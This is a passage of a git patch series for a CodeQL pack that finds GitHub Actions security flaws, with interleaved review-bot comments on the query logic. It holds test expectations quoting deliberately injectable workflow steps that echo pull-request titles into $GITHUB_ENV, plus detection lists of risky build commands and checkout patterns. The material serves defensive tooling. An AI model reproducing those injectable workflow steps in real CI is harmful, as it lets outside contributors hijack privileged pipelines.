"PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | 
@@ -26,8 +27,10 @@ nodes | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:49:19:49:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | -| .github/workflows/test4.yml:50:14:51:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | semmle.label | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | semmle.label | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> 
$GITHUB_ENV\n | subpaths 
@@ -40,4 +43,6 @@ subpaths | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | +| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n |
From 831b8cfaa6f0aca1369ae2d6a28b39af20217279 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Sun, 28 Apr 2024 12:03:40 +0200
Subject: [PATCH 227/707] Bump qlpack versions
---
 ql/lib/codeql/actions/dataflow/FlowSources.qll | 2 --
 ql/lib/qlpack.yml | 2 +-
 ql/src/qlpack.yml | 2 +-
 3 files changed, 2 insertions(+), 4 deletions(-)
diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll
index 754d28cb93e6..6dd9b5d36171 100644
--- a/ql/lib/codeql/actions/dataflow/FlowSources.qll
+++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll
@@ -211,8 +211,6 @@ class EventSource extends RemoteFlowSource {
 or
 textEvent(context) and flag = "text"
 or
- repoNameEvent(context) and flag = "repo name"
- or
 branchEvent(context) and flag = "branch"
 or
 labelEvent(context) and flag = "label"
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index 1710768761fe..3800ce9e85ca 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@
 library: true
 warnOnImplicitThis: true
 name: githubsecuritylab/actions-all
-version: 0.0.18
+version: 0.0.19
 dependencies:
 codeql/util: ^0.2.0
 codeql/yaml: ^0.1.2
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index 24f07dafe898..c431636c96a0 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: githubsecuritylab/actions-queries
-version: 0.0.18
+version: 0.0.19
 groups:
 - actions
 - queries
From 9843f375ee7acc33f2d26a268d48d10e031c0a44 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 30 Apr 2024 12:20:53 +0200 Subject: [PATCH 228/707] ignore runtime info for pull_request triggered workflows --- ql/lib/codeql/actions/ast/internal/Ast.qll | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 0c53dae63717..0cbb8ab10ed9 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -635,19 +635,22 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Holds if the workflow is privileged. */ predicate isPrivileged() { - // The job has a permission to write to some scope + // the job has an explicit write permission this.getPermissions().getAPermission() = "write" or - // The job accesses a secret + // the job accesses a secret other than GITHUB_TOKEN exists(SecretsExpressionImpl expr | expr.getEnclosingJob() = this and not expr.getFieldName() = "GITHUB_TOKEN" ) or - // The effective permissions have write access - exists(string path, string name, string secrets_source, string perms | - workflowDataModel(path, _, name, secrets_source, perms, _) and + // the effective permissions have write access + exists(string path, string trigger, string name, string secrets_source, string perms | + workflowDataModel(path, trigger, name, secrets_source, perms, _) and path.trim() = this.getLocation().getFile().getRelativePath() and name.trim().matches(this.getId() + "%") and + // We cannot trust the permissions for pull_request events since they depend on the + // location of the head branch + not trigger.trim() = "pull_request" and ( secrets_source.trim().toLowerCase() = "actions" or perms.toLowerCase().matches("%write%") From 16c77cbe255a72c263bcdf63ac93ad8b7c12f06c Mon Sep 17 00:00:00 2001 
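Review bot: `not trigger.trim() = "pull_request"` is an exact, case-sensitive comparison, whereas the neighbouring conditions on the same `workflowDataModel` row normalise with `trim().toLowerCase()` (`secrets_source`) and `toLowerCase()` (`perms`); unless the trigger column is known to be canonical, `not trigger.trim().toLowerCase() = "pull_request"` keeps the three checks consistent. The exact match also means `pull_request_target` rows still count towards privilege, which is presumably intended since that trigger runs with base-repository permissions, but the new comment could say so explicitly rather than leaving the reader to infer it. The body of `isPrivileged` continues past the end of the hunk.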
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Sat, 4 May 2024 23:27:26 +0200
Subject: [PATCH 229/707] Refactor untrusted checkout queries
---
 .../security/ArtifactPoisoningQuery.qll | 85 +------
 .../actions/security/PoisonableSteps.qll | 64 +++++
 .../security/UntrustedCheckoutQuery.qll | 229 ++++++++++++++++++
 ql/lib/qlpack.yml | 2 +-
 ql/src/Security/CWE-829/UntrustedCheckout.ql | 150 ------------
 ...dCheckout.md => UntrustedCheckoutError.md} | 0
 .../CWE-829/UntrustedCheckoutError.ql | 28 +++
 .../CWE-829/UntrustedCheckoutWarning.md | 0
 .../CWE-829/UntrustedCheckoutWarning.ql | 28 +++
 ql/src/qlpack.yml | 2 +-
 .../.github/workflows/artifactpoisoning21.yml | 2 +-
 .../.github/workflows/artifactpoisoning22.yml | 2 +-
 .../CWE-829/ArtifactPoisoning.expected | 8 +-
 .../PrivilegedArtifactPoisoning.expected | 12 +-
 .../Security/CWE-829/UntrustedCheckout.qlref | 1 -
 .../CWE-829/UntrustedCheckoutError.expected | 6 +
 .../CWE-829/UntrustedCheckoutError.qlref | 1 +
 ...cted => UntrustedCheckoutWarning.expected} | 6 -
 .../CWE-829/UntrustedCheckoutWarning.qlref | 1 +
 19 files changed, 383 insertions(+), 244 deletions(-)
 create mode 100644 ql/lib/codeql/actions/security/PoisonableSteps.qll
 create mode 100644 ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
 delete mode 100644 ql/src/Security/CWE-829/UntrustedCheckout.ql
 rename ql/src/Security/CWE-829/{UntrustedCheckout.md => UntrustedCheckoutError.md} (100%)
 create mode 100644 ql/src/Security/CWE-829/UntrustedCheckoutError.ql
 create mode 100644 ql/src/Security/CWE-829/UntrustedCheckoutWarning.md
 create mode 100644 ql/src/Security/CWE-829/UntrustedCheckoutWarning.ql
 delete mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckout.qlref
 create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.expected
 create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutError.qlref
 rename ql/test/query-tests/Security/CWE-829/{UntrustedCheckout.expected => UntrustedCheckoutWarning.expected} (79%)
create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutWarning.qlref diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 8b7eb51276d9..3635004bc318 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -3,6 +3,7 @@ private import codeql.actions.TaintTracking import codeql.actions.DataFlow private import codeql.actions.dataflow.ExternalFlow import codeql.actions.dataflow.FlowSources +import codeql.actions.security.PoisonableSteps string unzipRegexp() { result = ".*(unzip|tar)\\s+.*" } 
@@ -228,81 +229,19 @@ class DirectArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run {
}
}
-abstract class PoisonableStep extends Step { }
-
-// source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L16
-private string dangerousActions() {
- result =
- ["pre-commit/action", "oxsecurity/megalinter", "bridgecrewio/checkov-action", "ruby/setup-ruby"]
-}
-
-class DangerousActionUsesStep extends PoisonableStep, UsesStep {
- DangerousActionUsesStep() {
- exists(UntrustedArtifactDownloadStep step |
- step.getAFollowingStep() = this and
- this.getCallee() = dangerousActions()
- )
- }
-}
-
-// source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L23
-private string dangerousCommands() {
- result =
- [
- "npm install", "npm run ", "yarn ", "npm ci(\\b|$)", "make ", "terraform plan",
- "terraform apply", "gomplate ", "pre-commit run", "pre-commit install", "go generate",
- "msbuild ", "mvn ", "./mvnw ", "gradle ", "./gradlew ", "bundle install", "bundle exec ",
- "^ant ", "mkdocs build", "pytest"
- ]
-}
-
-class BuildRunStep extends PoisonableStep, Run {
- BuildRunStep() {
- exists(UntrustedArtifactDownloadStep step |
- step.getAFollowingStep() = this and
- exists(
- this.getScript().splitAt("\n").trim().regexpFind("([^a-z]|^)" + dangerousCommands(), _, _)
- )
- )
- }
-}
-
-class LocalCommandExecutionRunStep extends PoisonableStep, Run {
- LocalCommandExecutionRunStep() {
- exists(UntrustedArtifactDownloadStep step |
- step.getAFollowingStep() = this and
- // Heuristic:
- // Run step with a command starting with `./xxxx`, `sh xxxx`, ...
- exists(
- this.getScript()
- .splitAt("\n")
- .trim()
- .regexpFind("([^a-z]|^)(./|(ba|z|fi)?sh\\s+)" + step.getPath(), _, _)
- )
- )
- }
-}
-
-class EnvVarInjectionRunStep extends PoisonableStep, Run {
- EnvVarInjectionRunStep() {
- exists(UntrustedArtifactDownloadStep step, string value |
- step.getAFollowingStep() = this and
- // Heuristic:
- // Run step with env var definition based on file content.
- // eg: `echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV`
- // eg: `echo "sha=$(> $GITHUB_ENV`
- Utils::writeToGitHubEnv(this, _, value) and
- // TODO: add support for other commands like `<`, `jq`, ...
- value.regexpMatch(["\\$\\(", "`"] + ["ls\\s+", "cat\\s+", "<"] + ".*" + ["`", "\\)"])
- )
- }
-}
-
class ArtifactPoisoningSink extends DataFlow::Node {
ArtifactPoisoningSink() {
- exists(PoisonableStep step |
- step.(Run).getScriptScalar() = this.asExpr() or
- step.(UsesStep) = this.asExpr()
+ exists(UntrustedArtifactDownloadStep download, PoisonableStep poisonable |
+ download.getAFollowingStep() = poisonable and
+ (
+ poisonable.(Run).getScriptScalar() = this.asExpr()
+ or
+ poisonable.(UsesStep) = this.asExpr()
+ ) and
+ (
+ not poisonable instanceof LocalCommandExecutionRunStep or
+ poisonable.(LocalCommandExecutionRunStep).getCommand().matches(download.getPath() + "%")
+ )
)
}
}
diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll
new file mode 100644
index 000000000000..130879a7cb6a
--- /dev/null
+++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll
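Review bot: The `LocalCommandExecutionRunStep` guard added at the end of this hunk is a bare prefix test, `getCommand().matches(download.getPath() + "%")`, so an artifact downloaded into `foo` is also accepted as the source of `./foobar/run.sh`, while a download into `foo/` (trailing slash) never matches the captured `foo/cmd`. Requiring a path-separator boundary handles both: `download.getPath() = "" or poisonable.(LocalCommandExecutionRunStep).getCommand().matches(download.getPath().regexpReplaceAll("/$", "") + "/%")`; the `= ""` disjunct is there to keep the path-less `artifactpoisoning22.yml` fixture (`sh cmd`) flagged, on the assumption that `getPath()` yields an empty string in that case — its definition is outside this hunk, so adapt that branch to whatever it really returns. Replacing the old `regexpFind(... + step.getPath())`, which interpreted the artifact path as a regular expression, with `matches` is an improvement; note that `%` and `_` remain wildcards in `matches`, so a path containing them would still over-match.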
@@ -0,0 +1,64 @@
+import actions
+
+abstract class PoisonableStep extends Step { }
+
+// source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L16
+private string dangerousActions() {
+ result =
+ ["pre-commit/action", "oxsecurity/megalinter", "bridgecrewio/checkov-action", "ruby/setup-ruby"]
+}
+
+class DangerousActionUsesStep extends PoisonableStep, UsesStep {
+ DangerousActionUsesStep() { this.getCallee() = dangerousActions() }
+}
+
+// source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L23
+private string dangerousCommands() {
+ result =
+ [
+ "npm install", "npm run ", "yarn ", "npm ci(\\b|$)", "make ", "terraform plan",
+ "terraform apply", "gomplate ", "pre-commit run", "pre-commit install", "go generate",
+ "msbuild ", "mvn ", "./mvnw ", "gradle ", "./gradlew ", "bundle install", "bundle exec ",
+ "^ant ", "mkdocs build", "pytest"
+ ]
+}
+
+class BuildRunStep extends PoisonableStep, Run {
+ BuildRunStep() {
+ exists(
+ this.getScript().splitAt("\n").trim().regexpFind("([^a-z]|^)" + dangerousCommands(), _, _)
+ )
+ }
+}
+
+class LocalCommandExecutionRunStep extends PoisonableStep, Run {
+ string cmd;
+
+ LocalCommandExecutionRunStep() {
+ // Heuristic:
+ // Run step with a command starting with `./xxxx`, `sh xxxx`, ...
+ exists(string line | line = this.getScript().splitAt("\n").trim() |
+ // ./xxxx
+ cmd = line.regexpCapture("(^|\\s+)\\.\\/(.*)", 2)
+ or
+ // sh xxxx
+ cmd = line.regexpCapture("(^|\\s+)(ba|z|fi)?sh\\s+(.*)", 3)
+ )
+ }
+
+ string getCommand() { result = cmd }
+}
+
+class EnvVarInjectionRunStep extends PoisonableStep, Run {
+ EnvVarInjectionRunStep() {
+ exists(string value |
+ // Heuristic:
+ // Run step with env var definition based on file content.
+ // eg: `echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV`
+ // eg: `echo "sha=$(> $GITHUB_ENV`
+ Utils::writeToGitHubEnv(this, _, value) and
+ // TODO: add support for other commands like `<`, `jq`, ...
+ value.regexpMatch(["\\$\\(", "`"] + ["ls\\s+", "cat\\s+", "<"] + ".*" + ["`", "\\)"])
+ )
+ }
+}
diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
new file mode 100644
index 000000000000..c677915f504c
--- /dev/null
+++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
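Review bot: `LocalCommandExecutionRunStep` now binds `cmd` with `regexpCapture`, which must match the whole trimmed line, so the invocation has to be the first token: `chmod +x foo/cmd && ./foo/cmd`, `cd foo && ./cmd` or `sudo sh foo/cmd` are no longer recognised, while the `regexpFind("([^a-z]|^)(./|(ba|z|fi)?sh\\s+)...")` form this replaces matched anywhere in the line. A lazy prefix keeps the capture and restores that coverage: `cmd = line.regexpCapture("(.*?)(^|\\s)\\.\\/(\\S+).*", 3)` and `cmd = line.regexpCapture("(.*?)(^|\\s)(ba|z|fi)?sh\\s+(\\S+).*", 4)`; stopping at `\\S+` also drops trailing arguments (`foo/cmd --flag`), which the current `(.*)` capture keeps and which only works because the consumer does a `%` prefix match. Interpreter flags (`sh -e foo/cmd`, `bash -x foo/cmd`) and other launchers (`python`, `node`, `source`/`.`) still fall through; a `(-\\S+\\s+)*` group before the path would cover the first. `cmd` is only bound for steps matching one of the two patterns, which is fine for a characteristic predicate but deserves a one-line comment above `string cmd;`, e.g. `// path after "./" or "sh " on the first matching script line; the only state behind getCommand()`.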
@@ -0,0 +1,229 @@
+import actions
+import codeql.actions.DataFlow
+
+bindingset[s]
+predicate containsPullRequestNumber(string s) {
+ exists(
+ Utils::normalizeExpr(s)
+ .regexpFind([
+ "\\bgithub\\.event\\.number\\b", "\\bgithub\\.event\\.issue\\.number\\b",
+ "\\bgithub\\.event\\.pull_request\\.id\\b",
+ "\\bgithub\\.event\\.pull_request\\.number\\b",
+ "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.id\\b",
+ "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.number\\b",
+ "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.id\\b",
+ "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.number\\b",
+ "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.id\\b",
+ "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.number\\b",
+ // heuristics
+ "\\bpr_number\\b", "\\bpr_id\\b"
+ ], _, _)
+ )
+}
+
+bindingset[s]
+predicate containsHeadSHA(string s) {
+ exists(
+ Utils::normalizeExpr(s)
+ .regexpFind([
+ "\\bgithub\\.event\\.pull_request\\.head\\.sha\\b",
+ "\\bgithub\\.event\\.pull_request\\.merge_commit_sha\\b",
+ "\\bgithub\\.event\\.workflow_run\\.head_commit\\.id\\b",
+ "\\bgithub\\.event\\.workflow_run\\.head_sha\\b",
+ "\\bgithub\\.event\\.check_suite\\.after\\b",
+ "\\bgithub\\.event\\.check_suite\\.head_commit\\.id\\b",
+ "\\bgithub\\.event\\.check_suite\\.head_sha\\b",
+ "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b",
+ "\\bgithub\\.event\\.check_run\\.check_suite\\.after\\b",
+ "\\bgithub\\.event\\.check_run\\.check_suite\\.head_commit\\.id\\b",
+ "\\bgithub\\.event\\.check_run\\.check_suite\\.head_sha\\b",
+ "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b",
+ "\\bgithub\\.event\\.check_run\\.head_sha\\b",
+ "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b",
+ // heuristics
+ "\\bhead\\.sha\\b", "\\bhead_sha\\b", "\\bpr_head_sha\\b"
+ ], _, _)
+ )
+}
+
+bindingset[s]
+predicate containsHeadRef(string s) {
+ exists(
+ Utils::normalizeExpr(s)
+ .regexpFind([
+ "\\bgithub\\.event\\.pull_request\\.head\\.ref\\b", "\\bgithub\\.head_ref\\b",
+ "\\bgithub\\.event\\.workflow_run\\.head_branch\\b",
+ "\\bgithub\\.event\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b",
+ "\\bgithub\\.event\\.check_run\\.check_suite\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b",
+ "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b",
+ // heuristics
+ "\\bhead\\.ref\\b", "\\bhead_ref\\b", "\\bpr_head_ref\\b",
+ // env vars
+ "\\benv\\.GITHUB_HEAD_REF\\b",
+ ], _, _)
+ )
+}
+
+/** Checkout of a Pull Request HEAD ref */
+abstract class PRHeadCheckoutStep extends Step { }
+
+/** Checkout of a Pull Request HEAD ref using actions/checkout action */
+class ActionsMutableRefCheckout extends PRHeadCheckoutStep instanceof UsesStep {
+ ActionsMutableRefCheckout() {
+ this.getCallee() = "actions/checkout" and
+ (
+ // ref argument contains the PR id/number or head ref/sha
+ exists(Expression e |
+ (
+ containsHeadRef(e.getExpression()) or
+ containsPullRequestNumber(e.getExpression())
+ ) and
+ DataFlow::hasLocalFlowExpr(e, this.getArgumentExpr("ref"))
+ )
+ or
+ // 3rd party actions returning the PR head sha/ref
+ exists(UsesStep step |
+ step.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and
+ // TODO: This should be read step of the head_sha or head_ref output vars
+ this.getArgument("ref").regexpMatch(".*head_ref.*") and
+ DataFlow::hasLocalFlowExpr(step, this.getArgumentExpr("ref"))
+ )
+ or
+ // heuristic base on the step id and field name
+ exists(StepsExpression e |
+ this.getArgumentExpr("ref") = e and
+ (
+ e.getStepId().matches(["%ref%", "%branch%"]) or
+ e.getFieldName().matches(["%ref%", "%branch%"])
+ )
+ )
+ )
+ }
+}
+
+/** Checkout of a Pull Request HEAD ref using actions/checkout action */
+class ActionsSHACheckout extends PRHeadCheckoutStep instanceof UsesStep {
+ ActionsSHACheckout() {
+ this.getCallee() = "actions/checkout" and
+ (
+ // ref argument contains the PR id/number or head ref/sha
+ exists(Expression e |
+ containsHeadSHA(e.getExpression()) and
+ DataFlow::hasLocalFlowExpr(e, this.getArgumentExpr("ref"))
+ )
+ or
+ // 3rd party actions returning the PR head sha/ref
+ exists(UsesStep step |
+ step.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and
+ this.getArgument("ref").regexpMatch(".*head_sha.*") and
+ DataFlow::hasLocalFlowExpr(step, this.getArgumentExpr("ref"))
+ )
+ or
+ // heuristic base on the step id and field name
+ exists(StepsExpression e |
+ this.getArgumentExpr("ref") = e and
+ (
+ e.getStepId().matches(["%sha%", "%commit%"]) or
+ e.getFieldName().matches(["%sha%", "%commit%"])
+ )
+ )
+ )
+ }
+}
+
+/** Checkout of a Pull Request HEAD ref using git within a Run step */
+class GitMutableRefCheckout extends PRHeadCheckoutStep instanceof Run {
+ GitMutableRefCheckout() {
+ exists(string line |
+ this.getScript().splitAt("\n") = line and
+ line.regexpMatch(".*git\\s+(fetch|pull).*") and
+ (
+ (containsHeadRef(line) or containsPullRequestNumber(line))
+ or
+ exists(string varname, string expr |
+ expr = this.getInScopeEnvVarExpr(varname).getExpression() and
+ (
+ containsHeadRef(expr) or
+ containsPullRequestNumber(expr)
+ ) and
+ exists(line.regexpFind(varname, _, _))
+ )
+ )
+ )
+ }
+}
+
+/** Checkout of a Pull Request HEAD ref using git within a Run step */
+class GitSHACheckout extends PRHeadCheckoutStep instanceof Run {
+ GitSHACheckout() {
+ exists(string line |
+ this.getScript().splitAt("\n") = line and
+ line.regexpMatch(".*git\\s+(fetch|pull).*") and
+ (
+ containsHeadSHA(line)
+ or
+ exists(string varname, string expr |
+ expr = this.getInScopeEnvVarExpr(varname).getExpression() and
+ containsHeadSHA(expr) and
+ exists(line.regexpFind(varname, _, _))
+ )
+ )
+ )
+ }
+}
+
+/** Checkout of a Pull Request HEAD ref using gh within a Run step */
+class GhMutableRefCheckout extends PRHeadCheckoutStep instanceof Run {
+ GhMutableRefCheckout() {
+ exists(string line |
+ this.getScript().splitAt("\n") = line and
+ line.regexpMatch(".*gh\\s+pr\\s+checkout.*") and
+ (
+ (containsHeadRef(line) or containsPullRequestNumber(line))
+ or
+ exists(string varname |
+ (
+ containsHeadRef(this.getInScopeEnvVarExpr(varname).getExpression()) or
+ containsPullRequestNumber(this.getInScopeEnvVarExpr(varname).getExpression())
+ ) and
+ exists(line.regexpFind(varname, _, _))
+ )
+ )
+ )
+ }
+}
+
+/** Checkout of a Pull Request HEAD ref using gh within a Run step */
